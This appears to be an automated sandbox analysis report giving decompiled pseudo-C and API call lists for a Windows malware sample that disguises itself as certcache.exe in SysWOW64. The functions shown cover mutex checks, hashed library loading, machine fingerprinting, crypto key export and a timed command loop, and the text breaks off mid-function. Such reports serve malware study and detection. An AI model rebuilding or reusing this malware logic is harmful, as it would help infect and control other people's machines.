    				_t2 = _t55 + 0xc; // 0xc
    				_t59 = _t2;
    				L00131830(0x131364, _t2);
    				_t63 =  *(_t67 - 4);
    				 *0x13c20c(_t67 - 0x88, 0x40, _t63,  *0x13c27c, 0x4b85ca91, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t22 = CreateMutexW(0, 0, _t67 - 0x88); // executed
    				_t61 = _t22;
    				if(_t61 != 0) {
    					_t29 = WaitForSingleObject(_t61, 0);
    					if(_t29 == 0 || _t29 == 0x80) {
    						goto 0x141903;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("lahf");
    						asm("int3");
    						L00131830(_t57, _t59);
    						_t65 =  *(_t67 - 4);
    						 *0x13c20c(_t67 - 0x188, 0x40, _t65,  *0x13c27c);
    						HeapFree(GetProcessHeap(), 0, _t65);
    						_t57 = 0x131264;
    						L00131830(0x131264, 0xc);
    						_t66 =  *(_t67 - 4);
    						 *0x13c20c(_t67 - 0x108, 0x40, _t66,  *0x13c27c, 0x4b85ca91, _t67 - 4);
    						HeapFree(GetProcessHeap(), 0, _t66);
    						_t42 = CreateMutexW(0, 0, _t67 - 0x108); // executed
    						 *0x13c2a0 = _t42;
    						if(_t42 != 0) {
    							goto 0x141924;
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							_t43 = CreateEventW();
    							 *0x13c29c = _t43;
    							if(_t43 != 0) {
    								_t53 = SignalObjectAndWait(_t43,  *0x13c2a0, 0xffffffff, 0);
    								if(_t53 == 0 || _t53 == 0x80) {
    									_t55 = ResetEvent( *0x13c29c);
    								}
    							}
    							ReleaseMutex(_t61);
    							CloseHandle(_t61);
    							if(_t55 != 0) {
    								_t46 = GetTickCount(); // executed
    								_push(0x10);
    								_push(0x3e8);
    								_push(0x1388);
    								_push(0);
    								 *0x13c280 = 1;
    								_push(E00138E20);
    								 *0x13c278 = _t46 + 0x1388;
    								_push(0);
    								_push(_t67 - 8);
    								if( *0x13c188() != 0) {
    									WaitForSingleObject( *0x13c29c, 0xffffffff);
    									 *0x13c11c(0,  *((intOrPtr*)(_t67 - 8)), 0xffffffff);
    								}
    								CloseHandle( *0x13c29c);
    							}
    						}
    					}
    				}
    				 *0x13c048( *0x13c288);
    				CryptDestroyKey( *0x13c28c);
    				CryptDestroyKey( *0x13c290);
    				CryptReleaseContext( *0x13c284, 0);
    				E00138AE0(_t55);
    				return E0013A7A0(_t57 | 0xffffffff);
    			}

















    APIs
    • memset.NTDLL ref: 001390C6
    • _snwprintf.NTDLL ref: 001390F5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139100
    • HeapFree.KERNEL32(00000000), ref: 00139107
    • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00139116
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00139128
    • CryptDestroyHash.ADVAPI32 ref: 001392A5
    • CryptDestroyKey.ADVAPI32 ref: 001392B1
    • CryptDestroyKey.ADVAPI32 ref: 001392BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 001392CB
      • Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
      • Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
      • Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
      • Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    APIs
    • GetProcessHeap.KERNEL32(?,?), ref: 00132452
    • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00132459
    • CryptDuplicateHash.ADVAPI32(?,?,?,?,?), ref: 0013247E
    • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00132497
    • CryptEncrypt.ADVAPI32(?,00000001,?,?,?), ref: 001324B4
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
    • HeapFree.KERNEL32(00000000), ref: 00132541
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 25%
    			E001324C8(void* __eax, void* __ebx, void* __edi) {
    				void* _t13;
    				void* _t19;
    				intOrPtr* _t24;
    				void* _t28;
    				void** _t29;
    				void* _t31;
    
    				_t26 = __edi;
    				 *((intOrPtr*)(_t31 - 0x14)) = 0x6c;
    				_t28 = __ebx;
    				_t13 =  *0x13c054( *0x13c28c,  *0x13c288, 1, 0x40, __eax); // executed
    				if(_t13 != 0) {
    					_t24 = _t31 - 0x15;
    					do {
    						_t28 = _t28 + 1;
    						 *((char*)(_t28 - 1)) =  *_t24;
    						_t24 = _t24 - 1;
    						_t19 = _t31 - 0x74;
    					} while (_t24 >= _t19);
    					 *((intOrPtr*)(_t31 - 0x14)) = 0x14;
    					 *0x13c068( *((intOrPtr*)(_t31 - 4)), 2, __ebx + 0x60, _t19);
    					_t26 =  !=  ? 1 : __edi;
    				}
    				_t29 =  *(_t31 + 8);
    				 *0x13c048( *((intOrPtr*)(_t31 - 4)));
    				if(_t26 == 0) {
    					HeapFree(GetProcessHeap(), 0,  *_t29);
    					 *_t29 = 0;
    					_t29[1] = 0;
    				}
    				return _t26;
    			}










    APIs
    • CryptExportKey.ADVAPI32(00000001,00000040), ref: 001324E2
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
    • HeapFree.KERNEL32(00000000), ref: 00132541
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 39%
    			E00139CB6(void* __ecx, void* __edx, void* __edi) {
    				struct HINSTANCE__* _t17;
    				struct HINSTANCE__* _t23;
    				struct HINSTANCE__* _t29;
    				struct HINSTANCE__* _t35;
    				struct HINSTANCE__* _t41;
    				struct HINSTANCE__* _t47;
    				struct HINSTANCE__* _t53;
    				struct HINSTANCE__* _t59;
    				void* _t63;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t106;
    
    				_t96 = __edi;
    				asm("lahf");
    				asm("int3");
    				L00131830(__ecx, __edx);
    				_t97 =  *(_t106 - 4);
    				_t17 = LoadLibraryW(_t97);
    				_push(0x13c040);
    				_push(0x30116feb);
    				_push(0x21);
    				L00131B10(_t17, 0x131040, _t96, _t97);
    				HeapFree(GetProcessHeap(), 0, _t97);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131568, 0xc);
    				_t98 =  *(_t106 - 4);
    				_t23 = LoadLibraryW(_t98);
    				_push(0x13c0c8);
    				_push(0x1f598772);
    				_push(1);
    				L00131B10(_t23, 0x131024, _t96, _t98);
    				HeapFree(GetProcessHeap(), 0, _t98);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131574, 0xc);
    				_t99 =  *(_t106 - 4);
    				_t29 = LoadLibraryW(_t99);
    				_push(0x13c214);
    				_push(0x41696925);
    				_push(2);
    				L00131B10(_t29, 0x131028, _t96, _t99);
    				HeapFree(GetProcessHeap(), 0, _t99);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131580, 0xc);
    				_t100 =  *(_t106 - 4);
    				_t35 = LoadLibraryW(_t100); // executed
    				_push(0x13c0c4);
    				_push(0x37dff52a);
    				_push(1);
    				L00131B10(_t35, 0x13100c, _t96, _t100);
    				HeapFree(GetProcessHeap(), 0, _t100);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131550, 0xc);
    				_t101 =  *(_t106 - 4);
    				_t41 = LoadLibraryW(_t101); // executed
    				_push(0x13c0cc);
    				_push(0x14c87d5f);
    				_push(1);
    				L00131B10(_t41, 0x1310c4, _t96, _t101);
    				HeapFree(GetProcessHeap(), 0, _t101);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131544, 0xc);
    				_t102 =  *(_t106 - 4);
    				_t47 = LoadLibraryW(_t102); // executed
    				_push(0x13c21c);
    				_push(0x786d5b64);
    				_push(2);
    				L00131B10(_t47, 0x1310c8, _t96, _t102);
    				HeapFree(GetProcessHeap(), 0, _t102);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x131598, 0xc);
    				_t103 =  *(_t106 - 4);
    				_t53 = LoadLibraryW(_t103);
    				_push(0x13c230);
    				_push(0x53973344);
    				_push(0xe);
    				L00131B10(_t53, 0x131220, _t96, _t103);
    				HeapFree(GetProcessHeap(), 0, _t103);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00131830(0x13158c, 0xc);
    				_t104 =  *(_t106 - 4);
    				_t59 = LoadLibraryW(_t104); // executed
    				_push(0x13c224);
    				_push(0x221bf2d2);
    				_push(3);
    				L00131B10(_t59, 0x131214, _t96, _t104);
    				HeapFree(GetProcessHeap(), 0, _t104); // executed
    				_t63 = L001392F0(_t59); // executed
    				return _t63;
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 00139CC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139CE8
    • HeapFree.KERNEL32(00000000), ref: 00139CEF
    • LoadLibraryW.KERNEL32(?), ref: 00139D14
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139D38
    • HeapFree.KERNEL32(00000000), ref: 00139D3F
    • LoadLibraryW.KERNEL32(?), ref: 00139D64
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139D88
    • HeapFree.KERNEL32(00000000), ref: 00139D8F
    • LoadLibraryW.KERNEL32(?), ref: 00139DB4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139DD8
    • HeapFree.KERNEL32(00000000), ref: 00139DDF
    • LoadLibraryW.KERNEL32(?), ref: 00139E04
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139E28
    • HeapFree.KERNEL32(00000000), ref: 00139E2F
    • LoadLibraryW.KERNEL32(?), ref: 00139E54
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139E78
    • HeapFree.KERNEL32(00000000), ref: 00139E7F
    • LoadLibraryW.KERNEL32(?), ref: 00139EA4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139EC8
    • HeapFree.KERNEL32(00000000), ref: 00139ECF
    • LoadLibraryW.KERNEL32(?), ref: 00139EF4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139F18
    • HeapFree.KERNEL32(00000000), ref: 00139F1F
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 15%
    			E001394C1(void* __ecx, signed short __edx, void* __eflags) {
    				void* _t17;
    				int _t20;
    				signed int _t27;
    				void* _t28;
    				void* _t30;
    				void* _t36;
    				signed short* _t38;
    				signed short _t39;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t48;
    
    				_t39 = __edx;
    				L00131830(__ecx, __edx);
    				_t41 =  *(_t45 - 4);
    				 *0x13c20c("C:\Windows\SysWOW64", 0x104, _t41, "C:\Windows\SysWOW64", "certcache");
    				HeapFree(GetProcessHeap(), 0, _t41);
    				_t42 =  *(_t45 - 8);
    				 *0x13c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t42, "C:\Windows\SysWOW64", "certcache");
    				_t48 = _t46 + 0x30;
    				HeapFree(GetProcessHeap(), 0, _t42);
    				_t17 = CreateFileW("C:\Windows\SysWOW64\certcache.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t43 = _t17;
    				if(_t43 != 0xffffffff) {
    					goto 0x1419c0;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3"); // executed
    					_t28 = CreateFileMappingW(); // executed
    					_t40 = _t28;
    					if(_t40 != 0) {
    						goto 0x1419d9;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3"); // executed
    						_t30 = MapViewOfFile(); // executed
    						_t36 = _t30;
    						if(_t36 != 0) {
    							 *0x13cbd0 = RtlComputeCrc32(0, _t36, GetFileSize(_t43, 0));
    							UnmapViewOfFile(_t36);
    						}
    						CloseHandle(_t40);
    					}
    					CloseHandle(_t43);
    				}
    				 *(_t45 - 8) = 0x10;
    				_t20 = GetComputerNameW(_t45 - 0x28, _t45 - 8); // executed
    				if(_t20 != 0) {
    					_t38 = _t45 - 0x28;
    					if( *(_t45 - 0x28) != 0) {
    						goto 0x1419f0;
    						asm("int3");
    						do {
    							_t27 =  *_t38 & 0x0000ffff;
    							if(_t27 < 0x30 || _t27 > 0x39) {
    								if(_t27 < 0x61 || _t27 > 0x7a) {
    									if(_t27 < 0x41 || _t27 > 0x5a) {
    										 *_t38 = _t39;
    									}
    								}
    							}
    							_t38 =  &(_t38[1]);
    						} while ( *_t38 != 0);
    					}
    					_t44 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t44 == 0) {
    						_t44 =  *(_t45 - 8);
    					} else {
    						goto 0x141a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("lahf");
    						asm("int3");
    						E00131790(_t38, _t39);
    						_t48 = _t48 + 8;
    					}
    					 *0x13c1f8("216554_6C0D37D2", 0x104, _t44, _t45 - 0x28,  *0x13c3ac);
    					_t20 = HeapFree(GetProcessHeap(), 0, _t44);
    				}
    				goto 0x141a1e;
    				return _t20;
    			}

    APIs
    • _snwprintf.NTDLL ref: 001394DE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001394EA
    • HeapFree.KERNEL32(00000000), ref: 001394F1
    • _snwprintf.NTDLL ref: 0013950F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0013951B
    • HeapFree.KERNEL32(00000000), ref: 00139522
    • CreateFileW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0013953C
    • GetComputerNameW.KERNEL32(?,?), ref: 001395B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00139608
    • _snprintf.NTDLL ref: 00139642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
    • HeapFree.KERNEL32(00000000), ref: 00139655
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 89%
    			E00138E20(void* __ebx, void* __edx, void* __edi) {
    				void* _v16;
    				void* _v24;
    				char _v28;
    				void* _v32;
    				char _v36;
    				intOrPtr _v44;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v84;
    				void* _v92;
    				signed int _t28;
    				long _t29;
    
    				_t28 = GetTickCount(); // executed
    				if(_t28 <  *0x13c278) {
    					L24:
    					return _t28;
    				} else {
    					_t29 =  *0x13c280; // 0x4
    					_t28 = _t29 - 1;
    					if(_t28 > 3) {
    						goto L24;
    					} else {
    						switch( *((intOrPtr*)(_t28 * 4 +  &M00139094))) {
    							case 0:
    								 *0x13c280 = 2;
    								return _t28;
    								goto L25;
    							case 1:
    								 *0x13c280 = 0;
    								__eax = L00139670();
    								__eax = __eax;
    								if(__eax == 0) {
    									 *0x13c280 = 3;
    									_pop(__esi);
    									return __eax;
    								} else {
    									if(__eax != 0) {
    										goto L24;
    									} else {
    										__eax = SetEvent( *0x13c29c);
    										_pop(__esi);
    										return __eax;
    									}
    								}
    								goto L25;
    							case 2:
    								 *0x13c280 = 0;
    								 *0x13c294 = 0x131270;
    								 *0x13c298 = 0x131270; // executed
    								__eax = L00132310();
    								__eax =  *0x13c02c; // 0x1312f8
    								 *0x13c26c = __eax;
    								__eax =  *0x13c030; // 0x6a
    								 *0x13c268 = 0x13c2a8;
    								 *0x13c270 = __eax;
    								 *0x13c280 = 4;
    								_pop(__esi);
    								return __eax;
    								goto L25;
    							case 3:
    								__ecx =  &_v28;
    								 *0x13c280 = 0; // executed
    								__eax = L00138BF0( &_v28); // executed
    								__ecx =  &_v36;
    								__eax = L00138D90(__eax,  &_v36);
    								__eax =  *0x13cbd0; // 0xf71b1512
    								_push("216554_6C0D37D2");
    								_v32 = __eax;
    								_v44 = 0x13c2a8;
    								_v44 =  *0x13c130();
    								__eax =  *0x13c2a4; // 0x1
    								_v52 = __eax;
    								do {
    									__ecx =  &_v24;
    									__esi = 0xdbba0;
    									__eax = L00138960(__edx, 0xdbba0);
    									__ecx =  &_v16;
    									__eax = L0013A7F0(__edx, 0xdbba0);
    									__edx =  &_v52;
    									__ecx =  &_v84;
    									if(L00139FD0(__ebx, __ecx, __edx) != 0) {
    										__eax =  &_v92;
    										_push( &_v92);
    										__eax =  &_v84;
    										_push(__eax); // executed
    										__eax = L00138560(__eax, __ecx); // executed
    										__esp = __esp + 8;
    										if(__eax == 0) {
    											__eax =  *0x13c298; // 0x131280
    											__esi = 0x7530;
    											__eax = __eax + 8;
    											 *0x13c298 = __eax;
    											 *0x13c298 = __eax;
    										} else {
    											__eax = L001399F0(__eax, __ecx, __edi);
    											__ecx = 0;
    											__eax = E001388F0(0);
    											__ecx = 0;
    											__eax = E0013A7A0(0);
    											__edx =  &_v76;
    											__ecx =  &_v92;
    											if(L0013A1D0( &_v92, __edx) != 0) {
    												__eax = L00131750(__edi);
    												__edx = _v72;
    												if(__edx != 0) {
    													__ecx = _v76;
    													__eax = L00139AE0(__eax, _v76, __edx);
    												}
    												__eax = L00131750(__edi);
    												__edx = _v64;
    												if(__edx != 0) {
    													__ecx = _v68;
    													__eax = L001389D0(__edx, __esi);
    													__esi = 0;
    												}
    												__eax = L00131750(__edi);
    												__edx = _v56;
    												if(__edx != 0) {
    													__ecx = _v60;
    													__eax = L0013A860(__edx, __esi);
    													__esi = 0;
    												}
    											}
    											GetProcessHeap() = HeapFree(__eax, 0, _v92);
    										}
    										GetProcessHeap() = HeapFree(__eax, 0, _v84);
    									}
    									GetProcessHeap() = HeapFree(__eax, 0, _v24);
    									GetProcessHeap() = HeapFree(__eax, 0, _v16);
    								} while (__esi == 0);
    								__eax = GetTickCount(); // executed
    								__eax = __eax + __esi;
    								 *0x13c280 = 4;
    								 *0x13c278 = __eax;
    								GetProcessHeap() = HeapFree(__eax, 0, _v32);
    								goto L24;
    						}
    					}
    				}
    				L25:
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00138E2A
    • SetEvent.KERNEL32 ref: 00138E84
    • lstrlen.KERNEL32 ref: 00138F26
    • HeapFree.KERNEL32(00000000), ref: 00139087
      • Part of subcall function 001388F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 00138908
      • Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
      • Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
      • Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
      • Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138FF2
    • HeapFree.KERNEL32(00000000), ref: 00138FF9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139028
    • HeapFree.KERNEL32(00000000), ref: 0013902F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0013903B
    • HeapFree.KERNEL32(00000000), ref: 00139042
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0013904E
    • HeapFree.KERNEL32(00000000), ref: 00139055
    • GetTickCount.KERNEL32 ref: 00139063
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00139080
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 142 139370-1393a0 GetModuleFileNameW OpenSCManagerW 143 1393b0-1393d7 GetProcessHeap RtlAllocateHeap 142->143 144 1393a2-1393aa CloseServiceHandle 142->144 145 1393d9 143->145 146 1393ef-139404 lstrlen 143->146 144->143 145->146
    C-Code - Quality: 21%
    			E00139370(void* __ecx, void* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				long _v12;
    				short _v44;
    				intOrPtr _t23;
    				void* _t25;
    				void* _t26;
    				signed int _t29;
    				void* _t45;
    				int _t48;
    				signed int _t55;
    				void* _t56;
    				void* _t58;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    				void* _t70;
    				signed int _t71;
    				short _t72;
    				void* _t74;
    				signed short* _t75;
    				void* _t77;
    				signed short _t80;
    				void* _t81;
    				void* _t82;
    				void* _t83;
    				void* _t84;
    				short* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t88;
    				void* _t89;
    				void* _t92;
    				void* _t93;
    				void* _t94;
    				void* _t96;
    
    				_t84 = __esi;
    				_t81 = __edi;
    				_t77 = __edx;
    				_t70 = __ecx;
    				_t23 =  *0x13c27c; // 0x6c0d37d2
    				_t93 = _t92 - 0x28;
    				 *0x13c3ac = _t23;
    				GetModuleFileNameW(0, "C:\Windows\SysWOW64\certcache.exe", 0x104);
    				_t25 = OpenSCManagerW(0, 0, 6); // executed
    				if(_t25 != 0) {
    					 *0x13c2a4 =  *0x13c2a4 | 0x00000001;
    					CloseServiceHandle(_t25);
    				}
    				_t26 =  *0x13c3ac; // 0x6c0d37d2
    				_push(_t84);
    				_push(_t81);
    				_t85 = 0x13c3b0;
    				_v8 = _t26;
    				_t82 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
    				if(_t82 == 0) {
    					_t82 = _v12;
    				} else {
    					goto 0x14197c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("lahf");
    					asm("int3");
    					E00131790(_t70, _t77);
    					_t93 = _t93 + 8;
    				}
    				_t29 =  *0x13c130(_t82, _t66);
    				_t71 = _t29;
    				_t67 = 2;
    				_v12 = _t71;
    				do {
    					_v8 =  !(_t29 / _t71);
    					_t29 = _t82 + _t29 % _t71;
    					if(_t29 <= _t82) {
    						L11:
    						if( *_t29 == 0x2c) {
    							goto L12;
    						}
    					} else {
    						while( *_t29 != 0x2c) {
    							_t29 = _t29 - 1;
    							if(_t29 > _t82) {
    								continue;
    							} else {
    								goto L11;
    							}
    							goto L13;
    						}
    						L12:
    						_t29 = _t29 + 1;
    					}
    					L13:
    					_t72 =  *_t29;
    					if(_t72 != 0) {
    						while(_t72 != 0x2c) {
    							_t29 = _t29 + 1;
    							 *_t85 = _t72;
    							_t85 = _t85 + 2;
    							_t72 =  *_t29;
    							if(_t72 != 0) {
    								continue;
    							}
    							goto L17;
    						}
    					}
    					L17:
    					_t71 = _v12;
    					_t67 = _t67 - 1;
    				} while (_t67 != 0);
    				HeapFree(GetProcessHeap(), 0, _t82);
    				 *_t85 = 0;
    				_push( &_v12);
    				_push(0x5f395cc9);
    				L00131830(0x131384, 0xc);
    				_t94 = _t93 + 8;
    				_push("C:\Windows\SysWOW64");
    				_push(0);
    				_push(0);
    				if(( *0x13c2a4 & 0x00000001) == 0) {
    					 *0x13c214(0, 0x1c);
    					_t80 = 0x14;
    					_t74 = 0x131530;
    				} else {
    					 *0x13c214(0, 0x29); // executed
    					_t80 = 4;
    					_t74 = 0x131380;
    				}
    				goto 0x1419a9;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				L00131830(_t74, _t80);
    				_t86 = _v8;
    				 *0x13c20c("C:\Windows\SysWOW64", 0x104, _t86, "C:\Windows\SysWOW64", "certcache");
    				HeapFree(GetProcessHeap(), 0, _t86);
    				_t87 = _v12;
    				 *0x13c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t87, "C:\Windows\SysWOW64", "certcache");
    				_t96 = _t94 + 0x30;
    				HeapFree(GetProcessHeap(), 0, _t87);
    				_t45 = CreateFileW("C:\Windows\SysWOW64\certcache.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t88 = _t45;
    				if(_t88 != 0xffffffff) {
    					goto 0x1419c0;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3"); // executed
    					_t56 = CreateFileMappingW(); // executed
    					_t83 = _t56;
    					if(_t83 != 0) {
    						goto 0x1419d9;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3"); // executed
    						_t58 = MapViewOfFile(); // executed
    						_t69 = _t58;
    						if(_t69 != 0) {
    							 *0x13cbd0 = RtlComputeCrc32(0, _t69, GetFileSize(_t88, 0));
    							UnmapViewOfFile(_t69);
    						}
    						CloseHandle(_t83);
    					}
    					CloseHandle(_t88);
    				}
    				_v12 = 0x10;
    				_t48 = GetComputerNameW( &_v44,  &_v12); // executed
    				if(_t48 != 0) {
    					_t75 =  &_v44;
    					if(_v44 != 0) {
    						goto 0x1419f0;
    						asm("int3");
    						do {
    							_t55 =  *_t75 & 0x0000ffff;
    							if(_t55 < 0x30 || _t55 > 0x39) {
    								if(_t55 < 0x61 || _t55 > 0x7a) {
    									if(_t55 < 0x41 || _t55 > 0x5a) {
    										 *_t75 = _t80;
    									}
    								}
    							}
    							_t75 =  &(_t75[1]);
    						} while ( *_t75 != 0);
    					}
    					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t89 == 0) {
    						_t89 = _v12;
    					} else {
    						goto 0x141a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("lahf");
    						asm("int3");
    						E00131790(_t75, _t80);
    						_t96 = _t96 + 8;
    					}
    					 *0x13c1f8("216554_6C0D37D2", 0x104, _t89,  &_v44,  *0x13c3ac);
    					_t48 = HeapFree(GetProcessHeap(), 0, _t89);
    				}
    				goto 0x141a1e;
    				return _t48;
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
    • OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
    • CloseServiceHandle.SECHOST(00000000), ref: 001393AA
    • GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
    • RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
    • lstrlen.KERNEL32(?), ref: 001393F4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 58%
    			E001386C5(intOrPtr* __edi) {
    				void* _t24;
    				void* _t26;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				InternetCloseHandle( *(_t26 - 0x30));
    				InternetCloseHandle( *(_t26 - 0x34)); // executed
    				InternetCloseHandle( *(_t26 - 0x38)); // executed
